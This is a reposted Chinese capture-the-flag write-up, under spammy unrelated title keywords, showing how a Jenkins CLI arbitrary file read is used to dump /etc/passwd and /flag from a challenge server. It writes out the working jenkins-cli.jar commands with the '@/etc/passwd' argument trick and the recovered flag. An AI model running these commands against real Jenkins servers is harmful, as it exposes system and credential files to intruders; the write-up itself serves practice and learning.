当前位置: 首页> 财经> 股票 > 网站代码是多少_珠海好的网站制作平台_北京优化靠谱的公司_重庆疫情最新数据

网站代码是多少_珠海好的网站制作平台_北京优化靠谱的公司_重庆疫情最新数据

时间:2025/8/27 17:09:22来源:https://blog.csdn.net/2302_82243198/article/details/143432287 浏览次数:0次
网站代码是多少_珠海好的网站制作平台_北京优化靠谱的公司_重庆疫情最新数据

1.前言

由于好久没做web题了,所以今天来尝试来做一波web题,仅供刷题记录。

2.题目

这个给的提示对于小白来说实在是友好的过劲。

3.分析

上网搜到一个关于Jenkins的历史漏洞,下面链接可供参考

https://blog.csdn.net/2301_80127209/article/details/139777834icon-default.png?t=O83Ahttps://blog.csdn.net/2301_80127209/article/details/139777834

打开页面


利用框架漏洞  ,路径后进行添加   /jnlpJars/jenkins-cli.jar,下载下来文件



进行读取文件   ,这里我把下载下来的文件放在了z盘,大家要根据其文件实际位置进行操作

java -jar jenkins-cli.jar -s http://8.130.84.100:8080/ -http who-am-i "@/etc/passwd"

成功实现任意文件读取功能 ,但只是显示了一部分

尝试目标是否开启了“匿名用户可读”选项,开启了话则可以显示全部命令,当然这一步也可省略,但是我们可以测试一波也花不了多长时间

java -jar jenkins-cli.jar -s http://8.130.84.100:8080/ -http connect-node "@/etc/passwd"

这时候我们可以尝试读取flag内容了,根据做题经验,猜测flag在根目录下
 

java -jar jenkins-cli.jar -s http://8.130.84.100:8080/ -http connect-node "@/flag"

成功获取到flag

4.答案

0xgame{2a6d2b88-7d12-4b66-901d-5ed489e9a322}

关键字:网站代码是多少_珠海好的网站制作平台_北京优化靠谱的公司_重庆疫情最新数据

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: